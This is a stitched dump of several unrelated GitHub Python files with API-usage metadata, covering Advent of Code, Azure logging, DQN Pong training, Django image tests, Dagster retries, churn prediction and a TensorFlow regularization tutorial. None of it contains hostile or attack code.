seating_re = re.compile('[L\.]')
workPath = os.path.expanduser("~/Documents/Code/Advent_of_code/2020")
os.chdir(workPath)
#with open("day-11_data.txt", "r") as in_file:
with open("test_data.txt", "r") as in_file:
data = array([list(row.strip()) for row in in_file])
empty_seats = ma.masked_where(data == 'L', data).mask
floor = ma.masked_where(data == '.', data).mask
occupied_seats = ma.masked_where(data == '#', data).mask
occupied = array([[False, False, False], [False, True, False], [False, False, False]])
# Part 1:
sorted_adapters = sort(data)
sorted_adapters = append(append(array([0]), sorted_adapters), sorted_adapters[-1]+3)
jolts = diff(sorted_adapters)
distribution = {k:v for k, v in zip(range(max(set(jolts))+4), bincount(jolts))}
print(f"The product of the counts of 1- and 3-jolt differences is {distribution[1]*distribution[3]}")
# Part 2:
def possible_permutations(n, m):
perms = (i for i in product(list(range(m + 1)), repeat=n) if sum(i) == n)
return set(tuple(n for n in sublist if n != 0) for sublist in perms)
max_step = 3
reps = re.findall('1{2,}', ''.join([str(i) for i in jolts]))
rep_lens = [len(i) for i in reps]
perm_dict = {s:len(possible_permutations(s, max_step)) for s in range(2, max(rep_lens) + 1)}
counts = np_prod([perm_dict[possibilities] for possibilities in rep_lens])
print(f"There are {counts} possible permutations of the adapters")
| jdmuss/advent_of_code | 2020/day_11.py | day_11.py | py | 1,586 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "re.compile",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path.expanduser",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "os.chdir",
"line_number":... |
3113291140 | """common logging for easy integration with application insights"""
import logging
import sys
from typing import Any, Dict, Optional
from opencensus.ext.azure.log_exporter import AzureLogHandler
class FunctionName:
ED = "event_driven"
PACKAGES = {
FunctionName.ED: "event_driven",
}
class OptionalCustomDimensionsFilter(logging.Formatter):
"""filter that outputs `custom_dimensions` if present"""
def __init__(self, message_fmt: str, function_name: str) -> None:
logging.Formatter.__init__(self, message_fmt, None)
self.function_name = function_name
def format(self, record: logging.LogRecord) -> str:
if "custom_dimensions" not in record.__dict__:
record.__dict__["custom_dimensions"] = ""
else:
# add the function name to custom_dimensions so it's queryable
record.__dict__["custom_dimensions"]["function"] = self.function_name
return super().format(record)
class CustomDimensionsFilter(logging.Filter):
"""filter for azure-targeted messages containing `custom_dimensions`"""
def filter(self, record: logging.LogRecord) -> bool:
return bool(record.__dict__["custom_dimensions"])
def init_logging(function_name: str, cnx_str: Optional[str] = None) -> logging.Logger:
"""initialize log handlers"""
package = PACKAGES[function_name]
logger = logging.getLogger(package)
logger.setLevel(logging.INFO)
# console handler
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setLevel(logging.DEBUG)
console_format = "[%(levelname)s] %(asctime)s - %(message)s %(custom_dimensions)s"
formatter = OptionalCustomDimensionsFilter(console_format, function_name)
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)
# azure log handler
if cnx_str is not None:
azure_handler = AzureLogHandler(connection_string=cnx_str)
azure_handler.addFilter(CustomDimensionsFilter())
logger.addHandler(azure_handler)
else:
logger.info(f"azure log handler not attached: {package} (missing key)")
return logger
def get_custom_dimensions(
dimensions: Dict[str, Any], function_name: str
) -> Dict[str, Any]:
"""merge the base dimensions with the given dimensions"""
base_dimensions = {"function": function_name}
base_dimensions.update(dimensions)
return {"custom_dimensions": base_dimensions}
| dgonzo27/event-driven-architecture | functions/utils/logging.py | logging.py | py | 2,446 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.Formatter",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "logging.Formatter.__init__",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "logging.Formatter",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name... |
28065082848 | from argparse import ArgumentParser
from collections import namedtuple, deque
from functools import partial
from random import sample
from time import time
import numpy as np
import torch
from gym import make
from numpy.random import random
from torch import tensor, save, no_grad
from torch.nn import MSELoss
from torch.optim import Adam
from torch.utils.tensorboard import SummaryWriter
from Chapter6.lib import wrappers, dqn_model
DEFAULT_ENV_NAME = "PongNoFrameskip-v4"
MEAN_REWARD_BOUND = 19.5
GAMMA = 0.99
BATCH_SIZE = 32
REPLAY_SIZE = 10000
REPLAY_START_SIZE = 10000
LEARNING_RATE = 1e-4
SYNC_TARGET_FRAMES = 1000
EPSILON_DECAY_LAST_FRAME = 150000
EPSILON_START = 1.0
EPSILON_FINAL = 0.01
Experience = namedtuple("Experience", field_names="state action reward done new_state")
class ExperienceBuffer:
def __init__(self, capacity):
self.buffer = deque(maxlen=capacity)
def __len__(self):
return len(self.buffer)
def append(self, experience):
self.buffer.append(experience)
def sample(self, batch_size):
entries = zip(*sample(self.buffer, k=batch_size))
array_data_types = (None, np.int64, np.float32, np.bool, None)
return tuple(map(np.array, entries, array_data_types))
class Agent:
def __init__(self, env, exp_buffer):
self.env = env
self.exp_buffer = exp_buffer
self.state = None
self._reset()
def _reset(self):
self.state = self.env.reset()
self.total_reward = 0.0
@no_grad
def play_step(self, net, epsilon=0.0, device="cuda"):
done_reward = None
if random() < epsilon:
action = self.env.action_space.sample()
else:
state_v = tensor(self.state).unsqueeze(0).to(device)
q_vals_v = net(state_v)
_, act_v = q_vals_v.max(dim=1)
action = int(act_v.item())
new_state, reward, is_done, _ = self.env.step(action)
self.total_reward += reward
self.total_reward += reward
exp = Experience(self.state, action, reward, is_done, new_state)
self.exp_buffer.append(exp)
self.state = new_state
if is_done:
done_reward = self.total_reward
self._reset()
return done_reward
def calc_loss(self, batch, net, tgt_net, device="cuda"):
cuda_tensor = partial(tensor, device=device)
states, actions, rewards, dones, next_states = map(cuda_tensor, batch)
state_action_values = net(states).gather(1, actions.unsqueeze(-1)).squeeze(-1)
with no_grad():
next_state_values = tgt_net(next_states).max(1)[0]
next_state_values[dones] = 0.0
next_state_values = next_state_values.detach()
expected_state_action_values = next_state_values * GAMMA + rewards
return MSELoss()(state_action_values, expected_state_action_values)
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("--cuda", default=True, action="store_true", help="Enable cuda")
parser.add_argument("--env", default=DEFAULT_ENV_NAME, help="Name of the environment")
parser.add_argument("--reward", type=float, default=MEAN_REWARD_BOUND,
help=f"Mean reward boundary for stop of training, default={MEAN_REWARD_BOUND:.2f}")
args = parser.parse_args()
device = torch.device("cuda" if args.cuda else "cpu")
env = wrappers.wrap_deepmind(make(args.env), episode_life=1, clip_rewards=1, frame_stack=1, scale=1)
net = dqn_model.DQN(env.observation_space.shape, env.action_space.n).to(device)
tgt_net = dqn_model.DQN(env.observation_space.shape, env.action_space.n).to(device)
with SummaryWriter(comment="-" + args.env) as writer:
print(net)
buffer = ExperienceBuffer(REPLAY_SIZE)
agent = Agent(env, buffer)
optimizer = Adam(net.parameters(), lr=LEARNING_RATE)
total_rewards = []
frame_idx = 0
ts_frame = 0
ts = time()
best_mean_reward = None
while True:
frame_idx += 1
epsilon = max(EPSILON_FINAL, EPSILON_START - frame_idx / EPSILON_DECAY_LAST_FRAME)
reward = agent.play_step(net, epsilon, device)
if reward is not None:
total_rewards.append(reward)
speed = (frame_idx - ts_frame) / (time() - ts)
ts_frame = frame_idx
ts = time()
mean_reward = np.mean(total_rewards[-100:])
print(f"{frame_idx} done {len(total_rewards)} games, mean reward {mean_reward:.3f},"
f" eps {epsilon:.2f}, speed {speed:.2f}")
writer.add_scalar("epsilon", epsilon, frame_idx)
writer.add_scalar("speed", speed, frame_idx)
writer.add_scalar("reward_100", mean_reward, frame_idx)
writer.add_scalar("reward", reward, frame_idx)
if best_mean_reward is None or best_mean_reward < mean_reward:
save(net.state_dict(), args.env + "-best.dat")
if best_mean_reward is not None:
print(f"Best mean reward updated {best_mean_reward:.3f} -> {mean_reward:.3f}, model saved")
best_mean_reward = mean_reward
if mean_reward > args.reward:
print(f"solved in {frame_idx} frames!")
break
if len(buffer) < REPLAY_START_SIZE:
continue
if frame_idx % SYNC_TARGET_FRAMES == 0:
tgt_net.load_state_dict(net.state_dict())
optimizer.zero_grad()
batch = buffer.sample(BATCH_SIZE)
loss_t = agent.calc_loss(batch, net, tgt_net, device)
loss_t.backward()
optimizer.step()
| Daggerfall-is-the-best-TES-game/reinforcement-learning | Chapter6/02_dqn_pong.py | 02_dqn_pong.py | py | 5,814 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "collections.namedtuple",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "collections.deque",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "random.sample",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "numpy.int64",
... |
28042659077 | import requests
from contextlib import closing
import csv
import codecs
import matplotlib.pyplot as plt
url = 'http://www.mambiente.munimadrid.es/opendata/horario.txt'
with closing(requests.get(url, stream='true')) as r:
reader = csv.reader(codecs.iterdecode(r.iter_lines(), 'utf-8'), delimiter=',')
for row in reader:
if (row[0] + row[1] + row[2] == '28079004' and row[3] == '12'):
plt.title('Oxido de nitrogeno: ' + row[8] + '/' + row[7] + row[6])
hora = 0
desp = 9
vs = []
horas = []
while hora <= 23:
if row[desp + 2 * hora + 1] == 'V':
vs.append(row[desp+2*hora])
horas.append(hora)
hora += 1
plt.plot(horas, vs)
plt.show() | Berckbel/bigDataPython | Ficheros/fIcherosEnWEB1.py | fIcherosEnWEB1.py | py | 835 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "contextlib.closing",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "csv.reader",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "codecs.iterdecode",
"lin... |
7135785492 | # -*- coding: utf-8 -*-
# ***************************************************
# * File : LSTM_CNN.py
# * Author : Zhefeng Wang
# * Email : wangzhefengr@163.com
# * Date : 2023-05-28
# * Version : 0.1.052816
# * Description : description
# * Link : link
# * Requirement : 相关模块版本需求(例如: numpy >= 2.1.0)
# ***************************************************
# python libraries
import os
import sys
ROOT = os.getcwd()
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT))
import torch
import torch.nn as nn
# global variable
LOGGING_LABEL = __file__.split('/')[-1][:-3]
class Model(nn.Module):
def __init__(self,
feature_size,
timestep,
hidden_size,
num_layers,
out_channels,
output_size) -> None:
super(Model, self).__init__()
self.hidden_size = hidden_size
self.num_layers = num_layers
# LSTM
self.lstm = nn.LSTM(
input_size = feature_size,
hidden_size = hidden_size,
num_layers = num_layers,
batch_first = True,
)
# 卷积层
self.conv1d = nn.Conv1d(
in_channels = timestep,
out_channels = out_channels,
kernel_size = 3,
)
# 输出层
self.linear1 = nn.Linear(in_features = 50 * 254, out_features = 256)
self.linear2 = nn.Linear(in_features = 256, out_features = output_size)
# 激活函数
self.relu = nn.ReLU()
def forward(self, x, hidden = None):
batch_size = x.shape[0]
# 初始化隐藏层状态
if hidden is None:
h_0 = x.data.new(self.num_layers, batch_size, self.hidden_size).fill_(0).float()
c_0 = x.data.new(self.num_layers, batch_size, self.hidden_size).fill_(0).float()
else:
h_0, c_0 = hidden
# LSTM
output, (h_0, c_0) = self.lstm(x, (h_0, c_0)) # (batch_size, timestep, hidden_size)
# 卷积
output = self.conv1d(output)
# 展开
output = output.flatten(output)
# 全连接层
output = self.linear1(output)
output = self.relu(output)
output = self.linear2(output)
return output
# 测试代码 main 函数
def main():
pass
if __name__ == "__main__":
main()
| wangzhefeng/tsproj | models/csdn/LSTM_CNN.py | LSTM_CNN.py | py | 2,422 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.getcwd",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "sys.path.append",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number":... |
40194408515 | from products.models import get_product_model
from django.contrib.auth import get_user_model
from django.test import TestCase
from django.urls import reverse
from django.core.files.uploadedfile import SimpleUploadedFile
import requests
# Create your tests here.
# Images app test
class ImageManagerTest(TestCase):
@classmethod
def setUpTestData(self):
self.product = get_product_model().objects.create(
name="Hoe",
producer="Universe",
price=25,
description="Test One",
count=1000,
)
casual_user = get_user_model().objects.create(
username="testuser",
)
casual_user.set_password("testpass123")
casual_user.save()
staff_user = get_user_model().objects.create(
username="staffuser",
is_staff=True,
)
staff_user.set_password("testpass123")
staff_user.save()
self.url = reverse("images_manager", kwargs={"pk": self.product.pk})
# images to test upload
self.images = list()
for i in range(5):
res = requests.get("https://picsum.photos/200/300", stream=True)
image = SimpleUploadedFile(
f"image{i}.jpg", res.content, content_type="image/jpeg"
)
self.images.append(image)
self.image = self.images[0]
# Initial images in test db
for i in range(5):
res = requests.get("https://picsum.photos/200/300", stream=True)
self.product.images.create(
image=SimpleUploadedFile(
f"image{i}.jpg", res.content, content_type="image/jpeg"
),
place=i,
)
def test_use_manager_as_unauthorized_user(self):
self.client.logout()
response = self.client.get(
self.url,
follow=True,
)
self.assertContains(response, "Sign In")
self.assertEquals(
response.wsgi_request.path,
reverse("account_login"),
)
self.assertEquals(
*response.redirect_chain,
(reverse("account_login") + "?next=" + self.url, 302),
)
assert "next" in response.wsgi_request.GET
self.assertEqual(response.wsgi_request.GET.get("next"), self.url)
self.assertEqual(response.wsgi_request.resolver_match.url_name, "account_login")
def test_manage_images_as_casual_user(self):
assert self.client.login(username="testuser", password="testpass123")
response = self.client.get(
self.url,
follow=True,
)
self.assertEquals(response.status_code, 403)
self.assertEquals(response.reason_phrase, "Forbidden")
def test_upload_image(self):
assert self.client.login(username="staffuser", password="testpass123")
images_count = self.product.images.count()
response = self.client.post(
self.url,
data={
"upload_images": "upload_images",
"image": self.image,
"product_pk": self.product.pk,
},
follow=True,
)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.product.images.count(), images_count + 1)
self.product.images.all().delete()
def test_upload_multiple_images(self):
assert self.client.login(username="staffuser", password="testpass123")
images_count = self.product.images.count()
response = self.client.post(
self.url,
data={
"upload_images": "upload_images",
"image": self.images,
"product_pk": self.product.pk,
},
follow=True,
)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.product.images.count(), images_count + 5)
def test_upload_non_image(self):
assert self.client.login(username="staffuser", password="testpass123")
txt_file = SimpleUploadedFile(
"file.txt", b"some text", content_type="text/plain"
)
images_count = self.product.images.count()
response = self.client.post(
self.url,
data={
"upload_images": "upload_images",
"image": txt_file,
"product_pk": self.product.pk,
},
follow=True,
)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.product.images.count(), images_count)
def test_delete_image(self):
assert self.client.login(username="staffuser", password="testpass123")
images_count = self.product.images.count()
response = self.client.post(
self.url,
data={
"image_pk": self.product.images.last().pk,
"delete": "delete",
"product_pk": self.product.pk,
},
follow=True,
)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.product.images.count(), images_count - 1)
def test_change_images_order(self):
assert self.client.login(username="staffuser", password="testpass123")
image = self.product.images.last()
images_count = self.product.images.count()
self.assertEqual(image.place, images_count - 1)
response = self.client.post(
self.url,
data={"image_pk": image.pk, "move_up": "move_up"},
follow=True,
)
image.refresh_from_db()
self.assertEqual(response.status_code, 200)
self.assertEqual(image.place, images_count - 2)
response = self.client.post(
self.url,
data={"image_pk": image.pk, "move_down": "move_down"},
follow=True,
)
image.refresh_from_db()
self.assertEqual(response.status_code, 200)
self.assertEqual(image.place, images_count - 1)
# border values
# border value down
for i in range(2):
response = self.client.post(
self.url,
data={"image_pk": image.pk, "move_down": "move_down"},
follow=True,
)
image.refresh_from_db()
self.assertEqual(response.status_code, 200)
self.assertEqual(image.place, images_count - 1)
# border value up
for i in range(images_count + 2):
response = self.client.post(
self.url,
data={"image_pk": image.pk, "move_up": "move_up"},
follow=True,
)
image.refresh_from_db()
self.assertEqual(response.status_code, 200)
self.assertEqual(image.place, 0)
# places don't repeat
self.assertEqual(
len(set(self.product.images.values_list("place", flat=True))), images_count
)
| Trojnar/django-store | images/tests.py | tests.py | py | 6,945 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.test.TestCase",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "products.models.get_product_model",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.get_user_model",
"line_number": 22,
"usage_type": "call"
},
... |
16156353318 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.core.validators
class Migration(migrations.Migration):
dependencies = [
('researcher_UI', '0019_auto_20170505_0444'),
]
operations = [
migrations.AddField(
model_name='study',
name='test_period',
field=models.IntegerField(default=14, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(14)]),
),
]
| langcog/web-cdi | webcdi/researcher_UI/migrations/0020_study_test_period.py | 0020_study_test_period.py | py | 544 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "django.db.migrations.Migration",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "django.db.migrations",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "django.db.migrations.AddField",
"line_number": 15,
"usage_type": "call"
},
{
... |
24623749772 | from utils.dataloader import make_datapath_list, VOCDataset, DataTransform
from torch.utils import data
from utils.pspnet import *
from torch import optim
import math
from utils import train
rootpath = "./data/VOCdevkit/VOC2012/"
train_img_list, train_anno_list, val_img_list, val_anno_list = make_datapath_list(rootpath)
color_mean = (0.485, 0.456, 0.406)
color_std = (0.229, 0.224, 0.225)
train_dataset = VOCDataset(train_img_list, train_anno_list, phase='train',
transform=DataTransform(input_size=475, color_mean=color_mean, color_std=color_std))
val_dataset = VOCDataset(val_img_list, val_anno_list, phase='val',
transform=DataTransform(input_size=475, color_mean=color_mean, color_std=color_std))
batch_size = 8
train_dataloader = data.DataLoader(val_dataset, batch_size=batch_size, shuffle=True)
val_dataloader = data.DataLoader(val_dataset, batch_size=batch_size, shuffle=False)
dataloaders_dict = {'train': train_dataloader, 'val': val_dataloader}
net = PSPNet(n_classes=150)
# 学習済みパラメータをロード
state_dict = torch.load("./weights/pspnet50_ADE20K.pth")
net.load_state_dict(state_dict)
# 分類用の畳み込み層を出力数21の層に付け替える
n_classes = 21
net.decode_feature.classification = nn.Conv2d(in_channels=512, out_channels=n_classes, kernel_size=1, stride=1, padding=0)
net.aux.classification = nn.Conv2d(in_channels=256, out_channels=n_classes, kernel_size=1, stride=1, padding=0)
def weights_init(m):
if isinstance(m, nn.Conv2d):
nn.init.xavier_normal_(m.weight.data)
if m.bias is not None:
nn.init.constant_(m.bias, 0.0)
net.decode_feature.classification.apply(weights_init)
net.aux.classification.apply(weights_init)
print("ネットワーク設定完了:学習済みパラメータをロードしました。")
# 学習率設定
optimizer = optim.SGD([
{'params': net.feature_conv.parameters(), 'lr': 1e-3},
{'params': net.feature_res_1.parameters(), 'lr': 1e-3},
{'params': net.feature_res_2.parameters(), 'lr': 1e-3},
{'params': net.feature_dilated_res_1.parameters(), 'lr': 1e-3},
{'params': net.feature_dilated_res_2.parameters(), 'lr': 1e-3},
{'params': net.pyramid_pooling.parameters(), 'lr': 1e-3},
{'params': net.decode_feature.parameters(), 'lr': 1e-2},
{'params': net.aux.parameters(), 'lr': 1e-2},
], momentum=0.9, weight_decay=0.0001)
def lambda_epoch(epoch):
max_epoch = 30
return math.pow((1-epoch/max_epoch), 0.9)
criterion = PSPLoss(aux_weight=0.4)
scheduler = optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda_epoch)
num_epochs = 30
train.train_model(net, dataloaders_dict, criterion, scheduler, optimizer, num_epochs) | TOnodera/pytorch-advanced | ch03/main.py | main.py | py | 2,748 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "utils.dataloader.make_datapath_list",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "utils.dataloader.VOCDataset",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "utils.dataloader.DataTransform",
"line_number": 15,
"usage_type": "call"
... |
495598497 | # pylint: disable=no-value-for-parameter
from dagster import Output, OutputDefinition, RunConfig, execute_pipeline, pipeline, solid
from dagster.core.instance import DagsterInstance
def test_retries():
fail = {'count': 0}
@solid
def fail_first_times(_, _start_fail):
if fail['count'] < 1:
fail['count'] += 1
raise Exception('blah')
return 'okay perfect'
@solid(
output_defs=[
OutputDefinition(bool, 'start_fail', is_optional=True),
OutputDefinition(bool, 'start_skip', is_optional=True),
]
)
def two_outputs(_):
yield Output(True, 'start_fail')
# won't yield start_skip
@solid
def will_be_skipped(_, _start_skip):
pass # doesn't matter
@solid
def downstream_of_failed(_, input_str):
return input_str
@pipeline
def pipe():
start_fail, start_skip = two_outputs()
downstream_of_failed(fail_first_times(start_fail))
will_be_skipped(start_skip)
env = {'storage': {'filesystem': {}}}
instance = DagsterInstance.ephemeral()
result = execute_pipeline(pipe, environment_dict=env, instance=instance, raise_on_error=False)
second_result = execute_pipeline(
pipe,
environment_dict=env,
run_config=RunConfig(previous_run_id=result.run_id),
instance=instance,
)
assert second_result.success
downstream_of_failed = second_result.result_for_solid('downstream_of_failed').output_value()
assert downstream_of_failed == 'okay perfect'
will_be_skipped = [
e for e in second_result.event_list if str(e.solid_handle) == 'will_be_skipped'
][0]
assert str(will_be_skipped.event_type_value) == 'STEP_SKIPPED'
| helloworld/continuous-dagster | deploy/dagster_modules/dagster/dagster_tests/core_tests/execution_tests/test_retries.py | test_retries.py | py | 1,768 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "dagster.solid",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "dagster.Output",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "dagster.solid",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "dagster.OutputDefinition",... |
71266832745 | import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import sklearn.model_selection as ms
import sklearn.preprocessing as pp
import sklearn.linear_model as lm
import sklearn.ensemble as en
import sklearn.metrics as met
import joblib as jb
df = pd.read_csv('churnprediction_ch9.csv', sep=',', index_col=['customer_id'])
aktif = df.groupby('churn').count()
plt.pie(aktif['product'],labels=['Aktif','Churn'], autopct='%1.0f%%')
plt.axis('equal')
plt.show()
df['product'].value_counts()
data = pd.concat([df, pd.get_dummies(df['product'])], axis=1, sort=False)
data.drop(['product'], axis=1, inplace=True)
dfk = data.corr()
sns.heatmap(dfk, xticklabels=dfk.columns.values, yticklabels=dfk.columns.values, annot=True, annot_kws={'size':12})
heat_map = plt.gcf()
heat_map.set_size_inches(10,10)
plt.xticks(fontsize=15)
plt.yticks(fontsize=15)
plt.show()
data.head(3)
X = data.drop(['reload_2','socmed_2','games','churn'], axis=1, inplace=False)
y = data['churn']
X_train, X_test, y_train, y_test = ms.train_test_split(X, y, test_size=0.2, random_state=0)
scl = pp.StandardScaler(copy=True, with_mean=True, with_std=True)
scl.fit(X_train)
X_train = scl.transform(X_train)
X_test = scl.transform(X_test)
# ALGORITMA LOGISTIC REGRESSION
model = lm.LogisticRegression(solver='lbfgs')
model.fit(X_train, y_train)
print(' ')
print('ALGORITMA LOGISTIC REGRESSION')
y_pred = model.predict(X_test)
print('y_pred : ', y_pred)
score = met.accuracy_score(y_test, y_pred)
print('score : ', score)
presisi = met.precision_score(y_test, y_pred)
print('presisi : ', presisi)
recall = met.recall_score(y_test, y_pred)
print('recall : ', recall)
auc = met.roc_auc_score(y_test, y_pred)
print('auc : ', auc)
print(' ')
jb.dump(model, "modelLogistic.sav")
# ALGORITMA RANDOM FOREST
model = en.RandomForestClassifier(n_estimators=200, random_state=0)
model.fit(X_train, y_train)
print('ALGORITMA RANDOM FOREST')
y_pred = model.predict(X_test)
print('y_pred : ', y_pred)
score = met.accuracy_score(y_test, y_pred)
print('score : ', score)
presisi = met.precision_score(y_test, y_pred)
print('presisi : ', presisi)
recall = met.recall_score(y_test, y_pred)
print('recall : ', recall)
auc = met.roc_auc_score(y_test, y_pred)
print('auc : ', auc)
jb.dump(model, "modelRF.sav")
fitur_penting = pd.Series(model.feature_importances_, index=X.columns)
fitur_penting.nlargest(10).plot(kind='barh')
plt.show()
| arfian-rp/machine-learning-python | Churn Prediction/main.py | main.py | py | 2,414 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.pie",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "matplotlib.py... |
12445078745 | import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import os
# Defining the seed for some random operations:
random_seed = 42
# Setting some variables to format the logs:
log_begin_red, log_begin_blue, log_begin_green = '\033[91m', '\033[94m', '\033[92m'
log_begin_bold, log_begin_underline = '\033[1m', '\033[4m'
log_end_format = '\033[0m'
num_classes = 10
img_rows, img_cols, img_ch = 28, 28, 1
input_shape = (img_rows, img_cols, img_ch)
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
x_train, x_test = x_train / 255.0, x_test / 255.0
x_train = x_train.reshape(x_train.shape[0], *input_shape)
x_test = x_test.reshape(x_test.shape[0], *input_shape)
# to highlight the advantages of regularization,
# we will make the recognition task harder
# by artificially reducing the number of samples available for training
x_train, y_train = x_train[:200], y_train[:200] # ... 200 training samples instead of 60,000...
print('Training data: {}'.format(x_train.shape))
print('Testing data: {}'.format(x_test.shape))
# 목표는 Training a Model with Regularization
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import (Input, Activation, Dense, Flatten, Conv2D, MaxPooling2D, Dropout,
BatchNormalization)
epochs = 200
batch_size = 32
@tf.function
def conv_layer(x, kernels, bias, s):
z = tf.nn.conv2d(x, kernels, strides=[1, s, s, 1], padding='VALID')
# Finally, applying the bias and activation function (e.g. ReLU):
return tf.nn.relu(z + bias)
class SimpleConvolutionLayer(tf.keras.layers.Layer):
def __init__(self, num_kernels=32, kernel_size=(3, 3), stride=1):
""" Initialize the layer.
:param num_kernels: Number of kernels for the convolution
:param kernel_size: Kernel size (H x W)
:param stride: Vertical/horizontal stride
"""
super().__init__()
self.num_kernels = num_kernels
self.kernel_size = kernel_size
self.stride = stride
def build(self, input_shape):
""" Build the layer, initializing its parameters.
This will be internally called the 1st time the layer is used.
:param input_shape: Input shape for the layer (e.g. BxHxWxC)
"""
num_input_ch = input_shape[-1] # assuming shape format BHWC
# Now we know the shape of the kernel tensor we need:
kernels_shape = (*self.kernel_size, num_input_ch, self.num_kernels)
# We initialize the filter values e.g. from a Glorot distribution:
glorot_init = tf.initializers.GlorotUniform()
self.kernels = self.add_weight( # method to add Variables to layer
name='kernels', shape=kernels_shape, initializer=glorot_init,
trainable=True) # and we make it trainable.
# Same for the bias variable (e.g. from a normal distribution):
self.bias = self.add_weight(
name='bias', shape=(self.num_kernels,),
initializer='random_normal', trainable=True)
def call(self, inputs):
""" Call the layer, apply its operations to the input tensor."""
return conv_layer(inputs, self.kernels, self.bias, self.stride)
def get_config(self):
"""
Helper function to define the layer and its parameters.
:return: Dictionary containing the layer's configuration
"""
return {'num_kernels': self.num_kernels,
'kernel_size': self.kernel_size,
'strides': self.strides,
'use_bias': self.use_bias}
# We will extend 위에 있는 layer class
# to add kernel/bias regularization.
# the Layer's method .add_loss() can be used for that purpose
from functools import partial
def l2_reg(coef=1e-2):
return lambda x: tf.reduce_sum(x ** 2) * coef
# 위의 레이어를 상속받은 후 정규화 식을 모든 계층에 추가
class ConvWithRegularizers(SimpleConvolutionLayer):
def __init__(self, num_kernels=32, kernel_size=(3, 3), stride=1,
kernel_regularizer=l2_reg(), bias_regularizer=None):
super().__init__(num_kernels, kernel_size, stride)
self.kernel_regularizer = kernel_regularizer
self.bias_regularizer = bias_regularizer
def build(self, input_shape):
super().build(input_shape)
# 더 쉬운 방법들
# 1. 사실 아래처럼 직접 복잡하게 안하고 단순하게 build() 내부에서
# self.add_weight(..., regularize-self.kernel_regularier)
# 이렇게 해도 됨
# 2. 케라스에 사전정의된 것도 있다
# l1 = tf.kreas.regularizers.l1(0.01)
# Conv2D(..., kernel_regularizer=l1)
# 이렇게 하면 fit에서 케라스는 자동으로 정규화항 로스를 계산한다
if self.kernel_regularizer is not None:
self.add_loss(partial(self.kernel_regularizer, self.kernels))
if self.bias_regularizer is not None:
self.add_loss(partial(self.bias_regularizer, self.bias))
conv = ConvWithRegularizers(num_kernels=32, kernel_size=(3, 3), stride=1,
kernel_regularizer=l2_reg(1.), bias_regularizer=l2_reg(1.))
conv.build(input_shape=tf.TensorShape((None, 28, 28, 1)))
# 여기에 추가 손실들이 배열로 담겨있다
# (즉, 계층마다 추가했던 모오든 정규화 텀들이 여기에 다 모여있음)
reg_losses = conv.losses
print('Regularization losses over kernel and bias parameters: {}'.format([loss.numpy() for loss in reg_losses]))
# Comparing with the L2 norms of its kernel and bias tensors:
kernel_norm, bias_norm = tf.reduce_sum(conv.kernels ** 2).numpy(), tf.reduce_sum(conv.bias ** 2).numpy()
print('L2 norms of kernel and bias parameters: {}'.format([kernel_norm, bias_norm]))
model = Sequential([
Input(shape=input_shape),
ConvWithRegularizers(kernel_regularizer=l2_reg(1.), bias_regularizer=l2_reg(1.)),
ConvWithRegularizers(kernel_regularizer=l2_reg(1.), bias_regularizer=l2_reg(1.)),
ConvWithRegularizers(kernel_regularizer=l2_reg(1.), bias_regularizer=l2_reg(1.))
])
print('Losses attached to the model and its layers:\n\r{} ({} losses)'.format([loss.numpy() for loss in model.losses],
len(model.losses)))
# 이제 정규화가 된 콘볼류션 레이어를 써서 르넷을 만들고 테스트를 해보자
class LeNet5(Model):
def __init__(self, num_classes, kernel_regularizer=l2_reg(), bias_regularizer=l2_reg()):
super(LeNet5, self).__init__()
self.conv1 = ConvWithRegularizers(6, kernel_size=(5, 5),
